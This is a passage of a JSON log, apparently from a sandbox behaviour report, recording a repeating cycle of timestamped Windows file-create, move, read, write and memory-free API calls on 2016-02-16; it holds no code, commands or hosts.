"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,190", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,190", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,200", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,200", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,210", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,210", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,220", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,220", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,220", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,230", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,250", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:47,250", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,340", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 